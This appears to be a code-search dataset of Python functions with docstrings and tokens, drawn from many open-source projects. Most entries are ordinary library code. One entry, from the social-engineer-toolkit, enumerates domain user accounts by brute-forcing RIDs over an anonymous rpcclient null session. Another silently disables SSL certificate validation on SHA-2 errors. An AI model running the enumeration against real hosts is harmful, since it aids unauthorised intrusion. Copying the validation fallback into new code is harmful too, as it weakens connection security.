OneDrive/onedrive-sdk-python
e5642f8cad8eea37a4f653c1a23dfcfc06c37110
src/onedrivesdk/model/audio.py
python
Audio.is_variable_bitrate
(self)
Gets and sets the isVariableBitrate Returns: bool: The isVariableBitrate
Gets and sets the isVariableBitrate Returns: bool: The isVariableBitrate
[ "Gets", "and", "sets", "the", "isVariableBitrate", "Returns", ":", "bool", ":", "The", "isVariableBitrate" ]
def is_variable_bitrate(self): """Gets and sets the isVariableBitrate Returns: bool: The isVariableBitrate """ if "isVariableBitrate" in self._prop_dict: return self._prop_dict["isVariableBitrate"] else: return None
[ "def", "is_variable_bitrate", "(", "self", ")", ":", "if", "\"isVariableBitrate\"", "in", "self", ".", "_prop_dict", ":", "return", "self", ".", "_prop_dict", "[", "\"isVariableBitrate\"", "]", "else", ":", "return", "None" ]
https://github.com/OneDrive/onedrive-sdk-python/blob/e5642f8cad8eea37a4f653c1a23dfcfc06c37110/src/onedrivesdk/model/audio.py#L205-L215
mysql/mysql-connector-python
c5460bcbb0dff8e4e48bf4af7a971c89bf486d85
lib/mysqlx/statement.py
python
ModifyStatement.execute
(self)
return self._connection.send_update(self)
Execute the statement. Returns: mysqlx.Result: Result object. Raises: ProgrammingError: If condition was not set.
Execute the statement.
[ "Execute", "the", "statement", "." ]
def execute(self): """Execute the statement. Returns: mysqlx.Result: Result object. Raises: ProgrammingError: If condition was not set. """ if not self.has_where: raise ProgrammingError("No condition was found for modify") return self._connection.send_update(self)
[ "def", "execute", "(", "self", ")", ":", "if", "not", "self", ".", "has_where", ":", "raise", "ProgrammingError", "(", "\"No condition was found for modify\"", ")", "return", "self", ".", "_connection", ".", "send_update", "(", "self", ")" ]
https://github.com/mysql/mysql-connector-python/blob/c5460bcbb0dff8e4e48bf4af7a971c89bf486d85/lib/mysqlx/statement.py#L883-L894
TensorSpeech/TensorflowTTS
34358d82a4c91fd70344872f8ea8a405ea84aedb
tensorflow_tts/models/fastspeech.py
python
TFTacotronPostnet.call
(self, inputs, training=False)
return outputs * extended_mask
Call logic.
Call logic.
[ "Call", "logic", "." ]
def call(self, inputs, training=False): """Call logic.""" outputs, mask = inputs extended_mask = tf.cast(tf.expand_dims(mask, axis=2), outputs.dtype) for i, (conv, bn) in enumerate(self.conv_batch_norm): outputs = conv(outputs) outputs = bn(outputs) outputs = self.activation[i](outputs) outputs = self.dropout(outputs, training=training) return outputs * extended_mask
[ "def", "call", "(", "self", ",", "inputs", ",", "training", "=", "False", ")", ":", "outputs", ",", "mask", "=", "inputs", "extended_mask", "=", "tf", ".", "cast", "(", "tf", ".", "expand_dims", "(", "mask", ",", "axis", "=", "2", ")", ",", "outputs", ".", "dtype", ")", "for", "i", ",", "(", "conv", ",", "bn", ")", "in", "enumerate", "(", "self", ".", "conv_batch_norm", ")", ":", "outputs", "=", "conv", "(", "outputs", ")", "outputs", "=", "bn", "(", "outputs", ")", "outputs", "=", "self", ".", "activation", "[", "i", "]", "(", "outputs", ")", "outputs", "=", "self", ".", "dropout", "(", "outputs", ",", "training", "=", "training", ")", "return", "outputs", "*", "extended_mask" ]
https://github.com/TensorSpeech/TensorflowTTS/blob/34358d82a4c91fd70344872f8ea8a405ea84aedb/tensorflow_tts/models/fastspeech.py#L564-L573
trustedsec/social-engineer-toolkit
02ed2e8f11635546d8d176daf736508bee9d742e
src/fasttrack/ridenum.py
python
sids_to_names
(ip, sid, start, stop)
return rid_accounts
[]
def sids_to_names(ip, sid, start, stop): rid_accounts = [] ranges = ['{0}-{1}'.format(sid, rid) for rid in range(start, stop)] # different chunk size for darwin (os x) chunk_size = 2500 if sys.platform == 'darwin': chunk_size = 5000 chunks = list(chunk(ranges, chunk_size)) for c in chunks: command = 'rpcclient -U "" {0} -N -c "lookupsids '.format(ip) command += ' '.join(c) command += '"' proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) stdout_value = proc.communicate()[0] if "NT_STATUS_ACCESS_DENIED" in stdout_value: print("[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.") global denied denied = 1 break for line in stdout_value.rstrip().split('\n'): if "*unknown*" not in line: if line != "": rid_account = line.split(" ", 1)[1] # will show during an unhandled request # '00000' are bogus accounts? # only return accounts ie. (1). Everything else should be a group if rid_account != "request" and '00000' not in rid_account and '(1)' in rid_account: # here we join based on spaces, for example 'Domain Admins' needs to be joined rid_account = rid_account.replace("(1)", "") # return the full domain\username rid_account = rid_account.rstrip() rid_accounts.append(rid_account) return rid_accounts
[ "def", "sids_to_names", "(", "ip", ",", "sid", ",", "start", ",", "stop", ")", ":", "rid_accounts", "=", "[", "]", "ranges", "=", "[", "'{0}-{1}'", ".", "format", "(", "sid", ",", "rid", ")", "for", "rid", "in", "range", "(", "start", ",", "stop", ")", "]", "# different chunk size for darwin (os x)", "chunk_size", "=", "2500", "if", "sys", ".", "platform", "==", "'darwin'", ":", "chunk_size", "=", "5000", "chunks", "=", "list", "(", "chunk", "(", "ranges", ",", "chunk_size", ")", ")", "for", "c", "in", "chunks", ":", "command", "=", "'rpcclient -U \"\" {0} -N -c \"lookupsids '", ".", "format", "(", "ip", ")", "command", "+=", "' '", ".", "join", "(", "c", ")", "command", "+=", "'\"'", "proc", "=", "subprocess", ".", "Popen", "(", "command", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ",", "shell", "=", "True", ")", "stdout_value", "=", "proc", ".", "communicate", "(", ")", "[", "0", "]", "if", "\"NT_STATUS_ACCESS_DENIED\"", "in", "stdout_value", ":", "print", "(", "\"[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.\"", ")", "global", "denied", "denied", "=", "1", "break", "for", "line", "in", "stdout_value", ".", "rstrip", "(", ")", ".", "split", "(", "'\\n'", ")", ":", "if", "\"*unknown*\"", "not", "in", "line", ":", "if", "line", "!=", "\"\"", ":", "rid_account", "=", "line", ".", "split", "(", "\" \"", ",", "1", ")", "[", "1", "]", "# will show during an unhandled request", "# '00000' are bogus accounts?", "# only return accounts ie. (1). Everything else should be a group", "if", "rid_account", "!=", "\"request\"", "and", "'00000'", "not", "in", "rid_account", "and", "'(1)'", "in", "rid_account", ":", "# here we join based on spaces, for example 'Domain Admins' needs to be joined", "rid_account", "=", "rid_account", ".", "replace", "(", "\"(1)\"", ",", "\"\"", ")", "# return the full domain\\username", "rid_account", "=", "rid_account", ".", "rstrip", "(", ")", "rid_accounts", ".", "append", "(", "rid_account", ")", "return", "rid_accounts" ]
https://github.com/trustedsec/social-engineer-toolkit/blob/02ed2e8f11635546d8d176daf736508bee9d742e/src/fasttrack/ridenum.py#L105-L139
andreikop/enki
3170059e5cb46dcc77d7fb1457c38a8a5f13af66
enki/plugins/cppfileswitch.py
python
Plugin._isImplementation
(self, filePath)
return any([filePath.endswith(suffix) for suffix in _IMPLEMENTATION_SUFFIXES])
Check if file is a header
Check if file is a header
[ "Check", "if", "file", "is", "a", "header" ]
def _isImplementation(self, filePath): """Check if file is a header """ return any([filePath.endswith(suffix) for suffix in _IMPLEMENTATION_SUFFIXES])
[ "def", "_isImplementation", "(", "self", ",", "filePath", ")", ":", "return", "any", "(", "[", "filePath", ".", "endswith", "(", "suffix", ")", "for", "suffix", "in", "_IMPLEMENTATION_SUFFIXES", "]", ")" ]
https://github.com/andreikop/enki/blob/3170059e5cb46dcc77d7fb1457c38a8a5f13af66/enki/plugins/cppfileswitch.py#L59-L63
grnet/synnefo
d06ec8c7871092131cdaabf6b03ed0b504c93e43
astakosclient/astakosclient/__init__.py
python
AstakosClient.membership_action
(self, memb_id, action, reason="")
return self._call_astakos(path, headers=req_headers, body=req_body, method="POST")
Perform action on a membership Arguments: memb_id -- membership identifier action -- action to perform, one of "leave", "cancel", "accept", "reject", "remove" reason -- reason of performing the action In case of success, return nothing.
Perform action on a membership
[ "Perform", "action", "on", "a", "membership" ]
def membership_action(self, memb_id, action, reason=""): """Perform action on a membership Arguments: memb_id -- membership identifier action -- action to perform, one of "leave", "cancel", "accept", "reject", "remove" reason -- reason of performing the action In case of success, return nothing. """ path = join_urls(self.api_memberships, str(memb_id)) path = join_urls(path, "action") req_headers = {'content-type': 'application/json'} req_body = parse_request({action: reason}, self.logger) return self._call_astakos(path, headers=req_headers, body=req_body, method="POST")
[ "def", "membership_action", "(", "self", ",", "memb_id", ",", "action", ",", "reason", "=", "\"\"", ")", ":", "path", "=", "join_urls", "(", "self", ".", "api_memberships", ",", "str", "(", "memb_id", ")", ")", "path", "=", "join_urls", "(", "path", ",", "\"action\"", ")", "req_headers", "=", "{", "'content-type'", ":", "'application/json'", "}", "req_body", "=", "parse_request", "(", "{", "action", ":", "reason", "}", ",", "self", ".", "logger", ")", "return", "self", ".", "_call_astakos", "(", "path", ",", "headers", "=", "req_headers", ",", "body", "=", "req_body", ",", "method", "=", "\"POST\"", ")" ]
https://github.com/grnet/synnefo/blob/d06ec8c7871092131cdaabf6b03ed0b504c93e43/astakosclient/astakosclient/__init__.py#L1008-L1024
bcbio/bcbio-nextgen
c80f9b6b1be3267d1f981b7035e3b72441d258f2
bcbio/variation/multi.py
python
_group_batches_shared
(xs, caller_batch_fn, prep_data_fn)
return singles + batches
Shared functionality for grouping by batches for variant calling and joint calling. when creating a pon (batch: pon_build) process samples as singles first
Shared functionality for grouping by batches for variant calling and joint calling. when creating a pon (batch: pon_build) process samples as singles first
[ "Shared", "functionality", "for", "grouping", "by", "batches", "for", "variant", "calling", "and", "joint", "calling", ".", "when", "creating", "a", "pon", "(", "batch", ":", "pon_build", ")", "process", "samples", "as", "singles", "first" ]
def _group_batches_shared(xs, caller_batch_fn, prep_data_fn): """Shared functionality for grouping by batches for variant calling and joint calling. when creating a pon (batch: pon_build) process samples as singles first """ singles = [] batch_groups = collections.defaultdict(list) for args in xs: data = utils.to_single_data(args) caller, batch = caller_batch_fn(data) region = _list_to_tuple(data["region"]) if "region" in data else () if batch is not None and batch != "pon_build": batches = batch if isinstance(batch, (list, tuple)) else [batch] for b in batches: batch_groups[(b, region, caller)].append(utils.deepish_copy(data)) else: data = prep_data_fn(data, [data]) singles.append(data) batches = [] for batch, items in batch_groups.items(): batch_data = utils.deepish_copy(_pick_lead_item(items)) # For nested primary batches, split permanently by batch if tz.get_in(["metadata", "batch"], batch_data): batch_name = batch[0] batch_data["metadata"]["batch"] = batch_name batch_data = prep_data_fn(batch_data, items) batch_data["group_orig"] = _collapse_subitems(batch_data, items) batch_data["group"] = batch batches.append(batch_data) return singles + batches
[ "def", "_group_batches_shared", "(", "xs", ",", "caller_batch_fn", ",", "prep_data_fn", ")", ":", "singles", "=", "[", "]", "batch_groups", "=", "collections", ".", "defaultdict", "(", "list", ")", "for", "args", "in", "xs", ":", "data", "=", "utils", ".", "to_single_data", "(", "args", ")", "caller", ",", "batch", "=", "caller_batch_fn", "(", "data", ")", "region", "=", "_list_to_tuple", "(", "data", "[", "\"region\"", "]", ")", "if", "\"region\"", "in", "data", "else", "(", ")", "if", "batch", "is", "not", "None", "and", "batch", "!=", "\"pon_build\"", ":", "batches", "=", "batch", "if", "isinstance", "(", "batch", ",", "(", "list", ",", "tuple", ")", ")", "else", "[", "batch", "]", "for", "b", "in", "batches", ":", "batch_groups", "[", "(", "b", ",", "region", ",", "caller", ")", "]", ".", "append", "(", "utils", ".", "deepish_copy", "(", "data", ")", ")", "else", ":", "data", "=", "prep_data_fn", "(", "data", ",", "[", "data", "]", ")", "singles", ".", "append", "(", "data", ")", "batches", "=", "[", "]", "for", "batch", ",", "items", "in", "batch_groups", ".", "items", "(", ")", ":", "batch_data", "=", "utils", ".", "deepish_copy", "(", "_pick_lead_item", "(", "items", ")", ")", "# For nested primary batches, split permanently by batch", "if", "tz", ".", "get_in", "(", "[", "\"metadata\"", ",", "\"batch\"", "]", ",", "batch_data", ")", ":", "batch_name", "=", "batch", "[", "0", "]", "batch_data", "[", "\"metadata\"", "]", "[", "\"batch\"", "]", "=", "batch_name", "batch_data", "=", "prep_data_fn", "(", "batch_data", ",", "items", ")", "batch_data", "[", "\"group_orig\"", "]", "=", "_collapse_subitems", "(", "batch_data", ",", "items", ")", "batch_data", "[", "\"group\"", "]", "=", "batch", "batches", ".", "append", "(", "batch_data", ")", "return", "singles", "+", "batches" ]
https://github.com/bcbio/bcbio-nextgen/blob/c80f9b6b1be3267d1f981b7035e3b72441d258f2/bcbio/variation/multi.py#L106-L134
mcfletch/pyopengl
02d11dad9ff18e50db10e975c4756e17bf198464
documentation/pydoc/pydoc2.py
python
PackageDocumentationGenerator.addInteresting
( self, specifier)
Add a module to the list of interesting modules
Add a module to the list of interesting modules
[ "Add", "a", "module", "to", "the", "list", "of", "interesting", "modules" ]
def addInteresting( self, specifier): """Add a module to the list of interesting modules""" if self.checkScope( specifier): ## print "addInteresting", specifier self.pending.append (specifier) else: self.completed[ specifier] = 1
[ "def", "addInteresting", "(", "self", ",", "specifier", ")", ":", "if", "self", ".", "checkScope", "(", "specifier", ")", ":", "##\t\t\tprint \"addInteresting\", specifier", "self", ".", "pending", ".", "append", "(", "specifier", ")", "else", ":", "self", ".", "completed", "[", "specifier", "]", "=", "1" ]
https://github.com/mcfletch/pyopengl/blob/02d11dad9ff18e50db10e975c4756e17bf198464/documentation/pydoc/pydoc2.py#L395-L401
RichardFrangenberg/Prism
09283b5146d9cdf9d489dcf252f7927083534a48
Prism/Plugins/ProjectManagers/Shotgun/external_modules/shotgun_api3/shotgun.py
python
Shotgun._make_call
(self, verb, path, body, headers)
Make an HTTP call to the server. Handles retry and failure.
Make an HTTP call to the server.
[ "Make", "an", "HTTP", "call", "to", "the", "server", "." ]
def _make_call(self, verb, path, body, headers): """ Make an HTTP call to the server. Handles retry and failure. """ attempt = 0 req_headers = {} req_headers["user-agent"] = "; ".join(self._user_agents) if self.config.authorization: req_headers["Authorization"] = self.config.authorization req_headers.update(headers or {}) body = body or None max_rpc_attempts = self.config.max_rpc_attempts rpc_attempt_interval = self.config.rpc_attempt_interval / 1000.0 while (attempt < max_rpc_attempts): attempt += 1 try: return self._http_request(verb, path, body, req_headers) except ssl_error_classes as e: # Test whether the exception is due to the fact that this is an older version of # Python that cannot validate certificates encrypted with SHA-2. If it is, then # fall back on disabling the certificate validation and try again - unless the # SHOTGUN_FORCE_CERTIFICATE_VALIDATION environment variable has been set by the # user. In that case we simply raise the exception. Any other exceptions simply # get raised as well. # # For more info see: # http://blog.shotgunsoftware.com/2016/01/important-ssl-certificate-renewal-and.html # # SHA-2 errors look like this: # [Errno 1] _ssl.c:480: error:0D0C50A1:asn1 encoding routines:ASN1_item_verify: # unknown message digest algorithm # # Any other exceptions simply get raised. if "unknown message digest algorithm" not in str(e) or \ "SHOTGUN_FORCE_CERTIFICATE_VALIDATION" in os.environ: raise if self.config.no_ssl_validation is False: LOG.warning("SSL Error: this Python installation is incompatible with " "certificates signed with SHA-2. Disabling certificate validation. " "For more information, see http://blog.shotgunsoftware.com/2016/01/" "important-ssl-certificate-renewal-and.html") self._turn_off_ssl_validation() # reload user agent to reflect that we have turned off ssl validation req_headers["user-agent"] = "; ".join(self._user_agents) self._close_connection() if attempt == max_rpc_attempts: raise except Exception: self._close_connection() if attempt == max_rpc_attempts: LOG.debug("Request failed. Giving up after %d attempts." % attempt) raise LOG.debug( "Request failed, attempt %d of %d. Retrying in %.2f seconds..." % (attempt, max_rpc_attempts, rpc_attempt_interval) ) time.sleep(rpc_attempt_interval)
[ "def", "_make_call", "(", "self", ",", "verb", ",", "path", ",", "body", ",", "headers", ")", ":", "attempt", "=", "0", "req_headers", "=", "{", "}", "req_headers", "[", "\"user-agent\"", "]", "=", "\"; \"", ".", "join", "(", "self", ".", "_user_agents", ")", "if", "self", ".", "config", ".", "authorization", ":", "req_headers", "[", "\"Authorization\"", "]", "=", "self", ".", "config", ".", "authorization", "req_headers", ".", "update", "(", "headers", "or", "{", "}", ")", "body", "=", "body", "or", "None", "max_rpc_attempts", "=", "self", ".", "config", ".", "max_rpc_attempts", "rpc_attempt_interval", "=", "self", ".", "config", ".", "rpc_attempt_interval", "/", "1000.0", "while", "(", "attempt", "<", "max_rpc_attempts", ")", ":", "attempt", "+=", "1", "try", ":", "return", "self", ".", "_http_request", "(", "verb", ",", "path", ",", "body", ",", "req_headers", ")", "except", "ssl_error_classes", "as", "e", ":", "# Test whether the exception is due to the fact that this is an older version of", "# Python that cannot validate certificates encrypted with SHA-2. If it is, then", "# fall back on disabling the certificate validation and try again - unless the", "# SHOTGUN_FORCE_CERTIFICATE_VALIDATION environment variable has been set by the", "# user. In that case we simply raise the exception. Any other exceptions simply", "# get raised as well.", "#", "# For more info see:", "# http://blog.shotgunsoftware.com/2016/01/important-ssl-certificate-renewal-and.html", "#", "# SHA-2 errors look like this:", "# [Errno 1] _ssl.c:480: error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:", "# unknown message digest algorithm", "#", "# Any other exceptions simply get raised.", "if", "\"unknown message digest algorithm\"", "not", "in", "str", "(", "e", ")", "or", "\"SHOTGUN_FORCE_CERTIFICATE_VALIDATION\"", "in", "os", ".", "environ", ":", "raise", "if", "self", ".", "config", ".", "no_ssl_validation", "is", "False", ":", "LOG", ".", "warning", "(", "\"SSL Error: this Python installation is incompatible with \"", "\"certificates signed with SHA-2. Disabling certificate validation. \"", "\"For more information, see http://blog.shotgunsoftware.com/2016/01/\"", "\"important-ssl-certificate-renewal-and.html\"", ")", "self", ".", "_turn_off_ssl_validation", "(", ")", "# reload user agent to reflect that we have turned off ssl validation", "req_headers", "[", "\"user-agent\"", "]", "=", "\"; \"", ".", "join", "(", "self", ".", "_user_agents", ")", "self", ".", "_close_connection", "(", ")", "if", "attempt", "==", "max_rpc_attempts", ":", "raise", "except", "Exception", ":", "self", ".", "_close_connection", "(", ")", "if", "attempt", "==", "max_rpc_attempts", ":", "LOG", ".", "debug", "(", "\"Request failed. Giving up after %d attempts.\"", "%", "attempt", ")", "raise", "LOG", ".", "debug", "(", "\"Request failed, attempt %d of %d. Retrying in %.2f seconds...\"", "%", "(", "attempt", ",", "max_rpc_attempts", ",", "rpc_attempt_interval", ")", ")", "time", ".", "sleep", "(", "rpc_attempt_interval", ")" ]
https://github.com/RichardFrangenberg/Prism/blob/09283b5146d9cdf9d489dcf252f7927083534a48/Prism/Plugins/ProjectManagers/Shotgun/external_modules/shotgun_api3/shotgun.py#L3420-L3484
SanPen/GridCal
d3f4566d2d72c11c7e910c9d162538ef0e60df31
src/GridCal/Engine/Replacements/poap_controller.py
python
Controller.best_point
(self, merit=None, filter=None)
Return the best point in the database satisfying some criterion. Args: merit: Function to minimize (default is r.value) filter: Predicate to use for filtering candidates Returns: Record minimizing merit() and satisfying filter(); or None if nothing satisfies the filter
Return the best point in the database satisfying some criterion.
[ "Return", "the", "best", "point", "in", "the", "database", "satisfying", "some", "criterion", "." ]
def best_point(self, merit=None, filter=None): """Return the best point in the database satisfying some criterion. Args: merit: Function to minimize (default is r.value) filter: Predicate to use for filtering candidates Returns: Record minimizing merit() and satisfying filter(); or None if nothing satisfies the filter """ if filter is None: fcomplete = [f for f in self.fevals if f.is_completed] else: fcomplete = [f for f in self.fevals if f.is_completed and filter(f)] if merit is None: def merit(r): return r.value if fcomplete: return min(fcomplete, key=merit)
[ "def", "best_point", "(", "self", ",", "merit", "=", "None", ",", "filter", "=", "None", ")", ":", "if", "filter", "is", "None", ":", "fcomplete", "=", "[", "f", "for", "f", "in", "self", ".", "fevals", "if", "f", ".", "is_completed", "]", "else", ":", "fcomplete", "=", "[", "f", "for", "f", "in", "self", ".", "fevals", "if", "f", ".", "is_completed", "and", "filter", "(", "f", ")", "]", "if", "merit", "is", "None", ":", "def", "merit", "(", "r", ")", ":", "return", "r", ".", "value", "if", "fcomplete", ":", "return", "min", "(", "fcomplete", ",", "key", "=", "merit", ")" ]
https://github.com/SanPen/GridCal/blob/d3f4566d2d72c11c7e910c9d162538ef0e60df31/src/GridCal/Engine/Replacements/poap_controller.py#L63-L83
IronLanguages/ironpython3
7a7bb2a872eeab0d1009fc8a6e24dca43f65b693
Src/StdLib/Lib/tkinter/tix.py
python
CheckList.getmode
(self, entrypath)
return self.tk.call(self._w, 'getmode', entrypath)
Returns the current mode of the entry given by entryPath.
Returns the current mode of the entry given by entryPath.
[ "Returns", "the", "current", "mode", "of", "the", "entry", "given", "by", "entryPath", "." ]
def getmode(self, entrypath): '''Returns the current mode of the entry given by entryPath.''' return self.tk.call(self._w, 'getmode', entrypath)
[ "def", "getmode", "(", "self", ",", "entrypath", ")", ":", "return", "self", ".", "tk", ".", "call", "(", "self", ".", "_w", ",", "'getmode'", ",", "entrypath", ")" ]
https://github.com/IronLanguages/ironpython3/blob/7a7bb2a872eeab0d1009fc8a6e24dca43f65b693/Src/StdLib/Lib/tkinter/tix.py#L1570-L1572
bpython/curtsies
56a0ad1199d346a059635982aa87ca07be17e14a
setup.py
python
version
()
Return version string.
Return version string.
[ "Return", "version", "string", "." ]
def version(): """Return version string.""" with open(os.path.join("curtsies", "__init__.py")) as input_file: for line in input_file: if line.startswith("__version__"): return ast.parse(line).body[0].value.s
[ "def", "version", "(", ")", ":", "with", "open", "(", "os", ".", "path", ".", "join", "(", "\"curtsies\"", ",", "\"__init__.py\"", ")", ")", "as", "input_file", ":", "for", "line", "in", "input_file", ":", "if", "line", ".", "startswith", "(", "\"__version__\"", ")", ":", "return", "ast", ".", "parse", "(", "line", ")", ".", "body", "[", "0", "]", ".", "value", ".", "s" ]
https://github.com/bpython/curtsies/blob/56a0ad1199d346a059635982aa87ca07be17e14a/setup.py#L6-L11
dclambert/Python-ELM
00a231e5b917d893fedb9f1747446ba0ac032b8e
random_layer.py
python
BaseRandomLayer.transform
(self, X, y=None)
return self._compute_hidden_activations(X)
Generate the random hidden layer's activations given X as input. Parameters ---------- X : {array-like, sparse matrix}, shape [n_samples, n_features] Data to transform y : is not used: placeholder to allow for usage in a Pipeline. Returns ------- X_new : numpy array of shape [n_samples, n_components]
Generate the random hidden layer's activations given X as input.
[ "Generate", "the", "random", "hidden", "layer", "s", "activations", "given", "X", "as", "input", "." ]
def transform(self, X, y=None): """Generate the random hidden layer's activations given X as input. Parameters ---------- X : {array-like, sparse matrix}, shape [n_samples, n_features] Data to transform y : is not used: placeholder to allow for usage in a Pipeline. Returns ------- X_new : numpy array of shape [n_samples, n_components] """ X = atleast2d_or_csr(X) if (self.components_ is None): raise ValueError('No components initialized') return self._compute_hidden_activations(X)
[ "def", "transform", "(", "self", ",", "X", ",", "y", "=", "None", ")", ":", "X", "=", "atleast2d_or_csr", "(", "X", ")", "if", "(", "self", ".", "components_", "is", "None", ")", ":", "raise", "ValueError", "(", "'No components initialized'", ")", "return", "self", ".", "_compute_hidden_activations", "(", "X", ")" ]
https://github.com/dclambert/Python-ELM/blob/00a231e5b917d893fedb9f1747446ba0ac032b8e/random_layer.py#L119-L138
SanPen/GridCal
d3f4566d2d72c11c7e910c9d162538ef0e60df31
src/GridCal/Engine/Replacements/poap_controller.py
python
BaseWorkerThread.add_worker
(self)
Add worker back to the work queue.
Add worker back to the work queue.
[ "Add", "worker", "back", "to", "the", "work", "queue", "." ]
def add_worker(self): "Add worker back to the work queue." logger.debug("Worker thread is ready") self.controller.add_worker(self)
[ "def", "add_worker", "(", "self", ")", ":", "logger", ".", "debug", "(", "\"Worker thread is ready\"", ")", "self", ".", "controller", ".", "add_worker", "(", "self", ")" ]
https://github.com/SanPen/GridCal/blob/d3f4566d2d72c11c7e910c9d162538ef0e60df31/src/GridCal/Engine/Replacements/poap_controller.py#L410-L413
awslabs/datawig
f641342d05e95485ed88503d3efd9c3cca3eb7ab
datawig/utils.py
python
sample_cartesian
(sets: List, idx: int, n: int = None)
return out
Draw samples from the cartesian product of all iterables in sets. Each row in the cartesian product has a unique index. This function returns the row with index idx without materialising any of the other rows. For a cartesian products of lists with length l1, l2, ... lm, taking the cartesian product can be thought of as traversing through all lists picking one element of each and repeating this until all possible combinations are exhausted. The number of combinations is N=l1*l2*...*lm. This can make materialization of the list impracticle. By taking the first element from every list that leads to a new combination, we can define a unique enumeration of all combinations. :param sets: List of iteratbles :param idx: Index of desired row in the cartersian product :param n: Number of rows in the cartesian product
Draw samples from the cartesian product of all iterables in sets. Each row in the cartesian product has a unique index. This function returns the row with index idx without materialising any of the other rows.
[ "Draw", "samples", "from", "the", "cartesian", "product", "of", "all", "iterables", "in", "sets", ".", "Each", "row", "in", "the", "cartesian", "product", "has", "a", "unique", "index", ".", "This", "function", "returns", "the", "row", "with", "index", "idx", "without", "materialising", "any", "of", "the", "other", "rows", "." ]
def sample_cartesian(sets: List, idx: int, n: int = None) -> List: """ Draw samples from the cartesian product of all iterables in sets. Each row in the cartesian product has a unique index. This function returns the row with index idx without materialising any of the other rows. For a cartesian products of lists with length l1, l2, ... lm, taking the cartesian product can be thought of as traversing through all lists picking one element of each and repeating this until all possible combinations are exhausted. The number of combinations is N=l1*l2*...*lm. This can make materialization of the list impracticle. By taking the first element from every list that leads to a new combination, we can define a unique enumeration of all combinations. :param sets: List of iteratbles :param idx: Index of desired row in the cartersian product :param n: Number of rows in the cartesian product """ if n is None: n = np.prod([len(y) for y in sets]) out = [] # prepare list to append elements to. width = n # width of the index set in which the desired row falls. for item_set in sets: width = width/len(item_set) # map index set onto first item_set bucket = int(np.floor(idx/width)) # determine index of the first item_set out.append(item_set[bucket]) idx = idx - bucket*width # restrict index to next item_set in the hierarchy (could use modulo operator here.) assert width == 1 # at the end of this procedure, the leaf index set should have width 1. return out
[ "def", "sample_cartesian", "(", "sets", ":", "List", ",", "idx", ":", "int", ",", "n", ":", "int", "=", "None", ")", "->", "List", ":", "if", "n", "is", "None", ":", "n", "=", "np", ".", "prod", "(", "[", "len", "(", "y", ")", "for", "y", "in", "sets", "]", ")", "out", "=", "[", "]", "# prepare list to append elements to.", "width", "=", "n", "# width of the index set in which the desired row falls.", "for", "item_set", "in", "sets", ":", "width", "=", "width", "/", "len", "(", "item_set", ")", "# map index set onto first item_set", "bucket", "=", "int", "(", "np", ".", "floor", "(", "idx", "/", "width", ")", ")", "# determine index of the first item_set", "out", ".", "append", "(", "item_set", "[", "bucket", "]", ")", "idx", "=", "idx", "-", "bucket", "*", "width", "# restrict index to next item_set in the hierarchy (could use modulo operator here.)", "assert", "width", "==", "1", "# at the end of this procedure, the leaf index set should have width 1.", "return", "out" ]
https://github.com/awslabs/datawig/blob/f641342d05e95485ed88503d3efd9c3cca3eb7ab/datawig/utils.py#L374-L407
home-assistant/supervisor
69c2517d5211b483fdfe968b0a2b36b672ee7ab2
supervisor/services/interface.py
python
ServiceInterface._data
(self)
Return data of this service.
Return data of this service.
[ "Return", "data", "of", "this", "service", "." ]
def _data(self) -> dict[str, Any]: """Return data of this service."""
[ "def", "_data", "(", "self", ")", "->", "dict", "[", "str", ",", "Any", "]", ":" ]
https://github.com/home-assistant/supervisor/blob/69c2517d5211b483fdfe968b0a2b36b672ee7ab2/supervisor/services/interface.py#L26-L27
goace/personal-file-sharing-center
4a5b903b003f2db1306e77c5e51b6660fc5dbc6a
web/template.py
python
CompiledTemplate.__init__
(self, f, filename)
[]
def __init__(self, f, filename): Template.__init__(self, '', filename) self.t = f
[ "def", "__init__", "(", "self", ",", "f", ",", "filename", ")", ":", "Template", ".", "__init__", "(", "self", ",", "''", ",", "filename", ")", "self", ".", "t", "=", "f" ]
https://github.com/goace/personal-file-sharing-center/blob/4a5b903b003f2db1306e77c5e51b6660fc5dbc6a/web/template.py#L936-L938
jbjorne/TEES
caf19a4a1352ac59f5dc13a8684cc42ce4342d9d
ExampleWriters/EdgeExampleWriter.py
python
EdgeExampleWriter.__init__
(self)
[]
def __init__(self): self.xType = "edge" self.removeEdges = True SentenceExampleWriter.__init__(self)
[ "def", "__init__", "(", "self", ")", ":", "self", ".", "xType", "=", "\"edge\"", "self", ".", "removeEdges", "=", "True", "SentenceExampleWriter", ".", "__init__", "(", "self", ")" ]
https://github.com/jbjorne/TEES/blob/caf19a4a1352ac59f5dc13a8684cc42ce4342d9d/ExampleWriters/EdgeExampleWriter.py#L9-L12
kornia/kornia
b12d6611b1c41d47b2c93675f0ea344b5314a688
kornia/geometry/transform/flips.py
python
rot180
(input: torch.Tensor)
return torch.flip(input, [-2, -1])
r"""Rotate a tensor image or a batch of tensor images 180 degrees. .. image:: _static/img/rot180.png Input must be a tensor of shape (C, H, W) or a batch of tensors :math:`(*, C, H, W)`. Args: input: input tensor. Returns: The rotated image tensor.
r"""Rotate a tensor image or a batch of tensor images 180 degrees.
[ "r", "Rotate", "a", "tensor", "image", "or", "a", "batch", "of", "tensor", "images", "180", "degrees", "." ]
def rot180(input: torch.Tensor) -> torch.Tensor: r"""Rotate a tensor image or a batch of tensor images 180 degrees. .. image:: _static/img/rot180.png Input must be a tensor of shape (C, H, W) or a batch of tensors :math:`(*, C, H, W)`. Args: input: input tensor. Returns: The rotated image tensor. """ return torch.flip(input, [-2, -1])
[ "def", "rot180", "(", "input", ":", "torch", ".", "Tensor", ")", "->", "torch", ".", "Tensor", ":", "return", "torch", ".", "flip", "(", "input", ",", "[", "-", "2", ",", "-", "1", "]", ")" ]
https://github.com/kornia/kornia/blob/b12d6611b1c41d47b2c93675f0ea344b5314a688/kornia/geometry/transform/flips.py#L104-L119
Podshot/MCEdit-Unified
90abfb170c65b877ac67193e717fa3a3ded635dd
stock-filters/Forester.py
python
assign_value
(x, y, z, values, save_file)
return result
Assign an index value to a location in mcmap. If the index is outside the bounds of the map, return None. If the assignment succeeds, return True.
Assign an index value to a location in mcmap.
[ "Assign", "an", "index", "value", "to", "a", "location", "in", "mcmap", "." ]
